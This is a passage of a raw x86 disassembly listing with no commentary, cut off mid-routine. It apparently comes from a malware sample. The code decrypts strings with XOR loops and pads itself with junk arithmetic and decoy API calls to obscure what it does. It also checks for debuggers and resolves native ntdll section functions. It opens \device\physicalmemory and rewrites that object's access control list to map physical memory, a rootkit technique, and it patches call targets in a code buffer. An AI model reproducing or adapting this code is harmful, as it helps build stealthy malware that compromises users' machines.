add eax, edi
lea eax, ds:410820h[eax]
movsx edx, byte ptr [eax]
xor edx, 5Fh
mov [eax], dl
inc edi
loc_401B5E: ; CODE XREF: .text:00401B45�j
cmp edi, esi
jl short loc_401B47
mov dword ptr [ebp-4], 0D0h
mov eax, dword_43C2A0
add eax, esi
mov byte ptr ds:dword_410820[eax], 0
xor edi, edi
mov edi, dword_43C2A0
add dword_43C2A0, 3
mov eax, dword_43C2A0
inc eax
add eax, esi
mov dword_43C2A0, eax
inc dword_43C2A0
cmp dword_43C2A0, 0E06h
jle short loc_401BAD
and dword_43C2A0, 0
loc_401BAD: ; CODE XREF: .text:00401BA4�j
lea eax, dword_410820[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401BB7 proc near ; CODE XREF: sub_4054C8+690�p
; sub_4098A8+FD2�p
var_D = byte ptr -0Dh
var_5 = byte ptr -5
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov ax, word_43C2A4
mov [ebp+var_4], ax
mov [ebp+var_2], 74D3h
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2], ax
mov ebx, [ebp+arg_4]
jmp short loc_401C1E
; ---------------------------------------------------------------------------
loc_401BE3: ; CODE XREF: sub_401BB7+6E�j
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0Dh
jnz short loc_401C1D
call sub_40C734 ; GetCurrentProcessId
mov eax, [ebp+arg_4]
mov edx, ebx
sub edx, eax
push edx
mov edx, [ebp+arg_0]
add edx, eax
push edx
push [ebp+arg_8]
call sub_40CC14
add esp, 0Ch
mov eax, ebx
sub eax, [ebp+arg_4]
mov edx, [ebp+arg_8]
mov byte ptr [edx+eax], 0
mov eax, ebx
add eax, 2
jmp short loc_401C9C
; ---------------------------------------------------------------------------
loc_401C1D: ; CODE XREF: sub_401BB7+33�j
inc ebx
loc_401C1E: ; CODE XREF: sub_401BB7+2A�j
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0
jnz short loc_401BE3
cmp [ebp+arg_4], 0
jz short loc_401C5F
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0
jnz short loc_401C5F
mov eax, ebx
dec eax
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 0Ah
jnz short loc_401C5F
mov [ebp+var_5], 4
movzx eax, [ebp+var_5]
imul eax, 11ACh
mov [ebp+var_5], al
mov eax, [ebp+arg_8]
mov byte ptr [eax], 0
mov eax, [ebp+arg_4]
inc eax
jmp short loc_401C9C
; ---------------------------------------------------------------------------
loc_401C5F: ; CODE XREF: sub_401BB7+74�j
; sub_401BB7+7D�j ...
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
call sub_40C95C ; lstrlenA
mov ebx, eax
or ebx, ebx
jz short loc_401C9A
mov [ebp+var_5], 2
add [ebp+var_5], 1
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
push [ebp+arg_8]
call sub_40C6D8
lea edi, [ebp+var_D]
lea esi, aFqgcpb ; "FqGcPB:"
movsd
movsd
mov eax, [ebp+arg_4]
add eax, ebx
jmp short loc_401C9C
; ---------------------------------------------------------------------------
loc_401C9A: ; CODE XREF: sub_401BB7+B8�j
xor eax, eax
loc_401C9C: ; CODE XREF: sub_401BB7+64�j
; sub_401BB7+A6�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_401BB7 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43C2B8
lea eax, ds:437350h[eax]
push eax
call sub_40CC14
add esp, 0Ch
mov dword ptr [ebp-4], 319h
xor edi, edi
jmp short loc_401CE8
; ---------------------------------------------------------------------------
loc_401CCE: ; CODE XREF: .text:00401CEA�j
mov eax, dword_43C2B8
add eax, edi
lea eax, ds:437350h[eax]
movsx edx, byte ptr [eax]
xor edx, 0F1h
mov [eax], dl
inc edi
loc_401CE8: ; CODE XREF: .text:00401CCC�j
cmp edi, esi
jl short loc_401CCE
mov eax, dword_43C2B8
add eax, esi
mov byte ptr ds:dword_437350[eax], 0
mov edi, dword_43C2B8
mov eax, edi
add eax, 4
add eax, esi
mov dword_43C2B8, eax
add dword_43C2B8, 2
cmp dword_43C2B8, 0DB0h
jle short loc_401D27
and dword_43C2B8, 0
loc_401D27: ; CODE XREF: .text:00401D1E�j
lea eax, dword_437350[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D31 proc near ; CODE XREF: sub_402843+93�p
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = word ptr -12h
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
push edi
mov [ebp+var_4], 15C6h
add [ebp+var_4], 325Fh
inc dword_43C230
mov ax, word_43C2BC
mov [ebp+var_A], ax
mov ebx, [ebp+arg_0]
and ds:dword_40E07C, 0
and ds:dword_41E8B8, 0
and ds:dword_41E9D0, 0
and ds:dword_40F1D0, 0
mov ds:dword_41B7A4, 4
mov ds:dword_41507C, 4
loc_401D8B: ; CODE XREF: sub_401D31+122�j
; sub_401D31+14F�j ...
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_415078, al
movzx eax, ds:byte_415078
or eax, eax
jl loc_402002
cmp eax, 0FFh
jg loc_402002
jmp off_43C2CC[eax*4]
; ---------------------------------------------------------------------------
call sub_40C740 ; GetCurrentThreadId
loc_401DBB: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
or byte ptr ds:dword_41E8B8, 40h
jmp loc_402002
; ---------------------------------------------------------------------------
inc dword_43C230
loc_401DCD: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
xor eax, eax
cmp byte ptr [ebx], 20h
setnz al
dec eax
and eax, 4
inc eax
mov [ebp+var_1C], eax
add ds:dword_41E9D0, eax
jmp loc_402002
; ---------------------------------------------------------------------------
loc_401DE8: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
or byte ptr ds:dword_41E8B8, 40h
test byte ptr [ebx], 38h
jnz loc_402002
loc_401DF8: ; CODE XREF: sub_401D31+7E�j
; DATA XREF: .data:0043C2DC�o ...
test ds:byte_415078, 1
jz short loc_401E11
mov eax, ds:dword_41B7A4
add ds:dword_41E9D0, eax
jmp loc_402002
; ---------------------------------------------------------------------------
loc_401E11: ; CODE XREF: sub_401D31+CE�j
inc ds:dword_41E9D0
jmp loc_402002
; ---------------------------------------------------------------------------
loc_401E1C: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
inc ds:dword_41E9D0
jmp loc_402002
; ---------------------------------------------------------------------------
inc dword_43C230
loc_401E2D: ; CODE XREF: sub_401D31+7E�j
; DATA XREF: .data:0043C364�o ...
test byte ptr ds:dword_41E8B8, 10h
jz short loc_401E3D
xor eax, eax
jmp loc_402195
; ---------------------------------------------------------------------------
loc_401E3D: ; CODE XREF: sub_401D31+103�j
call sub_40C794 ; GetProcessHeap
or byte ptr ds:dword_41E8B8, 10h
mov al, ds:byte_415078
mov ds:byte_40F1DC, al
jmp loc_401D8B
; ---------------------------------------------------------------------------
loc_401E58: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
test byte ptr ds:dword_41E8B8, 4
jz short loc_401E68
xor eax, eax
jmp loc_402195
; ---------------------------------------------------------------------------
loc_401E68: ; CODE XREF: sub_401D31+12E�j
lea edi, [ebp+var_18]
lea esi, aQ8abz ; "Q8az"
mov ecx, 3
rep movsw
or byte ptr ds:dword_41E8B8, 4
jmp loc_401D8B
; ---------------------------------------------------------------------------
loc_401E85: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
test byte ptr ds:dword_41E8B8, 8
jz short loc_401E95
xor eax, eax
jmp loc_402195
; ---------------------------------------------------------------------------
loc_401E95: ; CODE XREF: sub_401D31+15B�j
call sub_40C7D0 ; GetVersion
or byte ptr ds:dword_41E8B8, 8
mov al, ds:byte_415078
mov ds:byte_41FB00, al
jmp loc_401D8B
; ---------------------------------------------------------------------------
loc_401EB0: ; CODE XREF: sub_401D31+7E�j
; DATA XREF: .data:0043C464�o
test byte ptr ds:dword_41E8B8, 1
jz short loc_401EC0
xor eax, eax
jmp loc_402195
; ---------------------------------------------------------------------------
loc_401EC0: ; CODE XREF: sub_401D31+186�j
or byte ptr ds:dword_41E8B8, 1
mov ds:dword_41B7A4, 2
jmp loc_401D8B
; ---------------------------------------------------------------------------
loc_401ED6: ; CODE XREF: sub_401D31+7E�j
; DATA XREF: .data:0043C468�o
test byte ptr ds:dword_41E8B8, 2
jz short loc_401EE6
xor eax, eax
jmp loc_402195
; ---------------------------------------------------------------------------
loc_401EE6: ; CODE XREF: sub_401D31+1AC�j
mov [ebp+var_12], 2BC6h
sub [ebp+var_12], 1A0Bh
or byte ptr ds:dword_41E8B8, 2
mov ds:dword_41507C, 2
jmp loc_401D8B
; ---------------------------------------------------------------------------
inc dword_43C230
loc_401F0E: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
inc ds:dword_41E9D0
or byte ptr ds:dword_41E8B8, 40h
jmp loc_402002
; ---------------------------------------------------------------------------
loc_401F20: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
mov eax, ds:dword_41B7A4
add ds:dword_41E9D0, eax
or byte ptr ds:dword_41E8B8, 40h
jmp loc_402002
; ---------------------------------------------------------------------------
loc_401F37: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
mov eax, ds:dword_41B7A4
add eax, 2
add ds:dword_41E9D0, eax
jmp loc_402002
; ---------------------------------------------------------------------------
loc_401F4A: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
mov eax, ds:dword_41507C
add ds:dword_40F1D0, eax
jmp loc_402002
; ---------------------------------------------------------------------------
loc_401F5A: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
mov eax, ds:dword_41B7A4
add ds:dword_41E9D0, eax
jmp loc_402002
; ---------------------------------------------------------------------------
inc dword_43C230
loc_401F70: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
add ds:dword_41E9D0, 2
jmp loc_402002
; ---------------------------------------------------------------------------
loc_401F7C: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
add ds:dword_41E9D0, 3
jmp short loc_402002
; ---------------------------------------------------------------------------
loc_401F85: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
xor eax, eax
jmp loc_402195
; ---------------------------------------------------------------------------
loc_401F8C: ; CODE XREF: sub_401D31+7E�j
; DATA XREF: .data:0043C308�o
or byte ptr ds:dword_41E8B8, 20h
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_42FB10, al
movzx eax, ds:byte_42FB10
or eax, eax
jl short loc_401FFB
cmp eax, 0Bh
jg short loc_401FB4
jmp off_43C6CC[eax*4]
; ---------------------------------------------------------------------------
loc_401FB4: ; CODE XREF: sub_401D31+27A�j
cmp eax, 80h
jl short loc_401FFB
cmp eax, 0CFh
jg short loc_401FFB
jmp off_43C4FC[eax*4]
; ---------------------------------------------------------------------------
call sub_40C734 ; GetCurrentProcessId
loc_401FCE: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+27C�j ...
or byte ptr ds:dword_41E8B8, 40h
jmp short loc_402002
; ---------------------------------------------------------------------------
inc dword_43C230
jmp short loc_402002
; ---------------------------------------------------------------------------
loc_401FDF: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+27C�j ...
mov eax, ds:dword_41B7A4
add ds:dword_41E9D0, eax
jmp short loc_402002
; ---------------------------------------------------------------------------
loc_401FEC: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+27C�j ...
inc ds:dword_41E9D0
or byte ptr ds:dword_41E8B8, 40h
jmp short loc_402002
; ---------------------------------------------------------------------------
loc_401FFB: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+275�j ...
xor eax, eax
jmp loc_402195
; ---------------------------------------------------------------------------
loc_402002: ; CODE XREF: sub_401D31+6D�j
; sub_401D31+78�j ...
inc dword_43C230
test byte ptr ds:dword_41E8B8, 40h
jz loc_40210E
lea edi, [ebp+var_1C+2]
lea esi, aIh ; ">%<Ih"
mov ecx, 3
rep movsw
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_430C2C, al
mov [ebp+var_12], 46D1h
sub [ebp+var_12], 49BDh
movzx eax, ds:byte_430C2C
and eax, 0C0h
mov [ebp+var_13], al
movzx eax, ds:byte_430C2C
and eax, 7
mov [ebp+var_14], al
movzx eax, [ebp+var_13]
cmp eax, 0C0h
jz loc_40210E
call sub_40C794 ; GetProcessHeap
cmp [ebp+var_13], 40h
jnz short loc_402078
inc ds:dword_40F1D0
loc_402078: ; CODE XREF: sub_401D31+33F�j
mov byte ptr [ebp+var_1C+1], 69h
add byte ptr [ebp+var_1C+1], 1
movzx eax, [ebp+var_13]
cmp eax, 80h
jnz short loc_402096
mov eax, ds:dword_41507C
add ds:dword_40F1D0, eax
loc_402096: ; CODE XREF: sub_401D31+358�j
call sub_40C734 ; GetCurrentProcessId
cmp ds:dword_41507C, 2
jnz short loc_4020C1
mov byte ptr [ebp+var_1C], 71h
add byte ptr [ebp+var_1C], 25h
cmp [ebp+var_13], 0
jnz short loc_40210E
cmp [ebp+var_14], 6
jnz short loc_40210E
add ds:dword_40F1D0, 2
jmp short loc_40210E
; ---------------------------------------------------------------------------
loc_4020C1: ; CODE XREF: sub_401D31+371�j
mov [ebp+var_1E], 61CBh
sub [ebp+var_1E], 7700h
cmp [ebp+var_14], 4
jnz short loc_4020FB
call sub_40C734 ; GetCurrentProcessId
or byte ptr ds:dword_41E8B8, 80h
call sub_40C740 ; GetCurrentThreadId
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_41B7A0, al
movzx eax, ds:byte_41B7A0
and eax, 7
mov [ebp+var_14], al
loc_4020FB: ; CODE XREF: sub_401D31+3A0�j
cmp [ebp+var_14], 5
jnz short loc_40210E
cmp [ebp+var_13], 0
jnz short loc_40210E
add ds:dword_40F1D0, 4
loc_40210E: ; CODE XREF: sub_401D31+2DE�j
; sub_401D31+330�j ...
and ds:dword_40F1D4, 0
jmp short loc_40212F
; ---------------------------------------------------------------------------
loc_402117: ; CODE XREF: sub_401D31+409�j
mov eax, ebx
inc ebx
mov edx, ds:dword_40F1D4
mov al, [eax]
mov ds:byte_415070[edx], al
inc ds:dword_40F1D4
loc_40212F: ; CODE XREF: sub_401D31+3E4�j
mov eax, ds:dword_40F1D0
cmp ds:dword_40F1D4, eax
jb short loc_402117
mov [ebp+var_6], 1644h
sub [ebp+var_6], 0C83h
and ds:dword_40F1D4, 0
jmp short loc_402169
; ---------------------------------------------------------------------------
loc_402151: ; CODE XREF: sub_401D31+443�j
mov eax, ebx
inc ebx
mov edx, ds:dword_40F1D4
mov al, [eax]
mov ds:byte_43A560[edx], al
inc ds:dword_40F1D4
loc_402169: ; CODE XREF: sub_401D31+41E�j
mov eax, ds:dword_41E9D0
cmp ds:dword_40F1D4, eax
jb short loc_402151
mov [ebp+var_8], 2887h
add [ebp+var_8], 1636h
inc dword_43C230
mov eax, ebx
sub eax, [ebp+arg_0]
mov ds:dword_40E07C, eax
xor eax, eax
inc eax
loc_402195: ; CODE XREF: sub_401D31+107�j
; sub_401D31+132�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_401D31 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 1EAh
push esi
push dword ptr [ebp+8]
mov eax, dword_43CF34
lea eax, ds:4186C0h[eax]
push eax
call sub_40CC14
add esp, 0Ch
xor edi, edi
jmp short loc_4021E2
; ---------------------------------------------------------------------------
loc_4021C8: ; CODE XREF: .text:004021E4�j
mov eax, dword_43CF34
add eax, edi
lea eax, ds:4186C0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0D3h
mov [eax], dl
inc edi
loc_4021E2: ; CODE XREF: .text:004021C6�j
cmp edi, esi
jl short loc_4021C8
mov dword ptr [ebp-8], 278h
mov eax, dword_43CF34
add eax, esi
mov byte ptr ds:dword_4186C0[eax], 0
mov edi, dword_43CF34
mov eax, edi
add eax, 6
add eax, esi
mov dword_43CF34, eax
cmp eax, 0DCEh
jle short loc_40221C
and dword_43CF34, 0
loc_40221C: ; CODE XREF: .text:00402213�j
lea eax, dword_4186C0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402226 proc near ; CODE XREF: sub_402A48+15�p
var_4 = word ptr -4
var_1 = byte ptr -1
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov [ebp+var_1], 0C6h
sub [ebp+var_1], 4Eh
push offset aNtdll_dll ; "ntdll.dll"
call sub_40C77C ; GetModuleHandleA
mov edi, eax
mov esi, 3E55h
add esi, 765Dh
push offset aRtlinitunicode ; "RtlInitUnicodeString"
push edi
call sub_40C788 ; GetProcAddress
mov ds:dword_430C24, eax
call sub_40C7C4 ; GetTickCount
push offset aNtunmapviewofs ; "NtUnmapViewOfSection"
push edi
call sub_40C788 ; GetProcAddress
mov ds:dword_41D8A0, eax
push offset aNtopensection ; "NtOpenSection"
push edi
call sub_40C788 ; GetProcAddress
mov ds:dword_41B7AC, eax
mov esi, 3B63h
sub esi, 2C1Bh
push offset aNtmapviewofsec ; "NtMapViewOfSection"
push edi
call sub_40C788 ; GetProcAddress
mov ds:dword_41E8C8, eax
push offset aRtlntstatustod ; "RtlNtStatusToDosError"
push edi
call sub_40C788 ; GetProcAddress
mov ds:dword_430C20, eax
mov [ebp+var_4], 23Ah
sub [ebp+var_4], 4D70h
pop edi
pop esi
leave
retn
sub_402226 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4022BB proc near ; CODE XREF: sub_402A48+172�p
var_72 = dword ptr -72h
var_6E = byte ptr -6Eh
var_6D = dword ptr -6Dh
var_69 = byte ptr -69h
var_60 = byte ptr -60h
var_56 = word ptr -56h
var_53 = byte ptr -53h
var_52 = word ptr -52h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 78h
push ebx
push esi
push edi
call sub_40C794 ; GetProcessHeap
push offset aDevicePhysical ; "\\device\\physicalmemory"
lea eax, [ebp+var_60]
push eax
call ds:dword_430C24
call sub_40C794 ; GetProcessHeap
mov [ebp+var_18], 18h
mov ebx, 752Bh
inc ebx
and [ebp+var_14], 0
mov [ebp+var_53], 2Bh
add [ebp+var_53], 1
lea eax, [ebp+var_60]
mov [ebp+var_10], eax
call sub_40C794 ; GetProcessHeap
mov [ebp+var_C], 40h
mov [ebp+var_56], 683Eh
inc [ebp+var_56]
and [ebp+var_8], 0
lea edi, [ebp+var_69]
lea esi, byte_43CFE6
xor ecx, ecx
inc ecx
rep movsb
and [ebp+var_4], 0
call sub_40C7D0 ; GetVersion
and [ebp+var_30], 0
mov eax, dword_43CFE7
mov [ebp+var_6D], eax
and [ebp+var_2C], 0
mov [ebp+var_28], 1
mov [ebp+var_24], 1
call sub_40C794 ; GetProcessHeap
lea eax, aCurrent_user ; "CURRENT_USER"
mov [ebp+var_20], eax
lea edi, [ebp+var_6E]
lea esi, byte_43CFEB
xor ecx, ecx
inc ecx
rep movsb
mov [ebp+var_50], 2
mov eax, dword_43CFEC
mov [ebp+var_72], eax
mov [ebp+var_4C], 1
mov ebx, 206Fh
mov eax, ebx
add eax, ebx
mov ebx, eax
and [ebp+var_48], 0
lea edi, [ebp+var_44]
lea esi, [ebp+var_30]
mov ecx, 5
rep movsd
mov [ebp+var_52], 7B38h
movzx eax, [ebp+var_52]
mov edx, eax
add edx, eax
sub_4022BB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4023A7 proc near ; DATA XREF: sub_4403F5+2F�o
mov eax, edx
mov [ebp-52h], ax
lea eax, [ebp-18h]
push eax
push 60000h
lea eax, [ebp-1Ch]
push eax
call ds:dword_41B7AC
call sub_40C854 ; IsDebuggerPresent
lea eax, [ebp-78h]
push eax
push 0
lea eax, [ebp-64h]
push eax
push 0
push 0
push 4
push 6
push dword ptr [ebp-1Ch]
call sub_40CB78 ; GetSecurityInfo
call sub_40C734 ; GetCurrentProcessId
lea eax, [ebp-68h]
push eax
push dword ptr [ebp-64h]
lea eax, [ebp-50h]
push eax
mov eax, 0Bh
sub eax, dword_43CF30
push eax
call sub_40CB90 ; SetEntriesInAclA
call sub_40C7C4 ; GetTickCount
push 0
push dword ptr [ebp-68h]
push 0
push 0
push 4
push 6
push dword ptr [ebp-1Ch]
call sub_40CB84 ; SetSecurityInfo
call sub_40C734 ; GetCurrentProcessId
push dword ptr [ebp-1Ch]
call sub_40C7AC ; CloseHandle
lea eax, [ebp-18h]
push eax
push dword ptr [ebp-50h]
lea eax, [ebp-1Ch]
push eax
call ds:dword_41B7AC
call sub_40C764 ; RtlGetLastWin32Error
mov eax, [ebp-1Ch]
pop edi
pop esi
pop ebx
leave
retn
sub_4023A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402445 proc near ; CODE XREF: sub_402A48+230�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
call sub_40C740 ; GetCurrentThreadId
mov eax, [ebp+arg_4]
mov [ebp+var_10], eax
mov ecx, [ebp+arg_8]
mov [ebp+var_4], ecx
and [ebp+var_8], 0
mov [ebp+var_A], 3ABh
add [ebp+var_A], 6ED8h
xor edx, edx
mov [ebp+var_14], edx
mov [ebp+var_18], eax
mov [ebp+var_B], 23h
add [ebp+var_B], 1
push 4
push 0
push 1
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+var_4]
push 0
lea eax, [ebp+var_8]
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
call ds:dword_41E8C8
call sub_40C764 ; RtlGetLastWin32Error
mov eax, [ebp+var_8]
leave
retn
sub_402445 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024A8 proc near ; CODE XREF: sub_402A48+31A�p
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ax, word_43CFF0
mov [ebp+var_2], ax
push [ebp+arg_0]
push 0FFFFFFFFh
call ds:dword_41D8A0
leave
retn
sub_4024A8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43CFFC
lea eax, ds:412DE0h[eax]
push eax
call sub_40CC14
add esp, 0Ch
xor edi, edi
jmp short loc_402501
; ---------------------------------------------------------------------------
loc_4024EA: ; CODE XREF: .text:00402503�j
mov eax, dword_43CFFC
add eax, edi
lea eax, ds:412DE0h[eax]
movsx edx, byte ptr [eax]
xor edx, 75h
mov [eax], dl
inc edi
loc_402501: ; CODE XREF: .text:004024E8�j
cmp edi, esi
jl short loc_4024EA
mov dword ptr [ebp-4], 2E3h
mov eax, dword_43CFFC
add eax, esi
mov byte ptr ds:dword_412DE0[eax], 0
xor edi, edi
mov edi, dword_43CFFC
inc dword_43CFFC
mov eax, dword_43CFFC
add eax, 5
add eax, esi
mov dword_43CFFC, eax
add dword_43CFFC, 2
cmp dword_43CFFC, 0DF6h
jle short loc_402552
and dword_43CFFC, 0
loc_402552: ; CODE XREF: .text:00402549�j
mov dword ptr [ebp-8], 1Ch
lea eax, dword_412DE0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402563 proc near ; CODE XREF: sub_402843+1F8�p
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
lea edi, [ebp+var_7]
lea esi, aCcLN ; "CC$l+n"
mov ecx, 7
rep movsb
xor ebx, ebx
loc_40257E: ; CODE XREF: sub_402563+2D5�j
call sub_40C854 ; IsDebuggerPresent
mov eax, [ebp+arg_0]
movzx edx, byte ptr [eax+ebx]
cmp edx, 0FFh
jnz short loc_4025C9
movzx edx, byte ptr [ebx+eax+1]
cmp edx, 0FFh
jnz short loc_4025C9
movzx edx, byte ptr [ebx+eax+2]
cmp edx, 0FFh
jnz short loc_4025C9
movzx edx, byte ptr [ebx+eax+3]
cmp edx, 0FFh
jnz short loc_4025C9
movzx eax, byte ptr [ebx+eax+4]
cmp eax, 0FFh
jz loc_40283E
loc_4025C9: ; CODE XREF: sub_402563+2D�j
; sub_402563+3A�j ...
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_8]
lea eax, [eax+edx+5]
mov edx, [ebp+arg_0]
mov dl, [edx+ebx]
mov [eax+ebx], dl
mov [ebp+var_8], 0
loc_4025E0: ; CODE XREF: sub_402563+16C�j
mov eax, [ebp+arg_0]
movzx edx, [ebp+var_8]
imul edx, 0Ch
movzx edx, byte_43D090[edx]
movzx ecx, byte ptr [eax+ebx]
cmp ecx, edx
jnz loc_4026BA
mov ecx, ebx
dec ecx
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_4026BA
mov ecx, ebx
sub ecx, 2
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_4026BA
mov ecx, ebx
sub ecx, 3
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_4026BA
mov edx, ebx
sub edx, 4
movzx eax, byte ptr [eax+edx]
cmp eax, 0E8h
jnz short loc_4026BA
call sub_40C7C4 ; GetTickCount
movzx eax, [ebp+var_8]
imul eax, 0Ch
push off_43D098[eax]
call sub_40C77C ; GetModuleHandleA
movzx edi, [ebp+var_8]
imul edi, 0Ch
push off_43D094[edi]
push eax
call sub_40C788 ; GetProcAddress
mov [ebp+var_C], eax
call sub_40C854 ; IsDebuggerPresent
or eax, 0FFFFFFFFh
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_8]
lea edx, [edx+ecx+5]
add edx, ebx
sub edx, 4
sub eax, edx
add eax, [ebp+var_C]
sub eax, 4
mov [ebp+var_10], eax
call sub_40C740 ; GetCurrentThreadId
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_8]
lea eax, [eax+edx+5]
add eax, ebx
sub eax, 4
mov edx, [ebp+var_10]
mov ds:1[eax], edx
mov ax, word_43D103
mov [ebp+var_12], ax
jmp short loc_4026D4
; ---------------------------------------------------------------------------
loc_4026BA: ; CODE XREF: sub_402563+95�j
; sub_402563+A4�j ...
movzx eax, [ebp+var_8]
imul eax, 0Ch
cmp off_43D094[eax], 0
jz short loc_4026D4
add [ebp+var_8], 1
jmp loc_4025E0
; ---------------------------------------------------------------------------
loc_4026D4: ; CODE XREF: sub_402563+155�j
; sub_402563+166�j
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 4
jnz short loc_402744
mov edx, ebx
dec edx
cmp byte ptr [eax+edx], 4
jnz short loc_402744
mov edx, ebx
sub edx, 2
cmp byte ptr [eax+edx], 4
jnz short loc_402744
mov edx, ebx
sub edx, 3
cmp byte ptr [eax+edx], 4
jnz short loc_402744
mov edx, ebx
sub edx, 4
movzx edx, byte ptr [eax+edx]
cmp dl, 68h
jz short loc_40271D
cmp edx, 0BEh
jz short loc_40271D
mov edx, ebx
sub edx, 5
cmp byte ptr [eax+edx], 24h
jnz short loc_402744
loc_40271D: ; CODE XREF: sub_402563+1A5�j
; sub_402563+1AD�j
lea edi, [ebp+var_10+1]
lea esi, aTLd ; "T-+ld&"
mov ecx, 7
rep movsb
mov eax, [ebp+arg_4]
add eax, [ebp+arg_8]
lea edx, [eax+ebx+5]
sub edx, 4
add eax, 7
mov ds:1[edx], eax
loc_402744: ; CODE XREF: sub_402563+178�j
; sub_402563+181�j ...
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 2
jnz short loc_4027C9
mov edx, ebx
dec edx
cmp byte ptr [eax+edx], 2
jnz short loc_4027C9
mov edx, ebx
sub edx, 2
cmp byte ptr [eax+edx], 2
jnz short loc_4027C9
mov edx, ebx
sub edx, 3
cmp byte ptr [eax+edx], 2
jnz short loc_4027C9
mov edx, ebx
sub edx, 4
movzx eax, byte ptr [eax+edx]
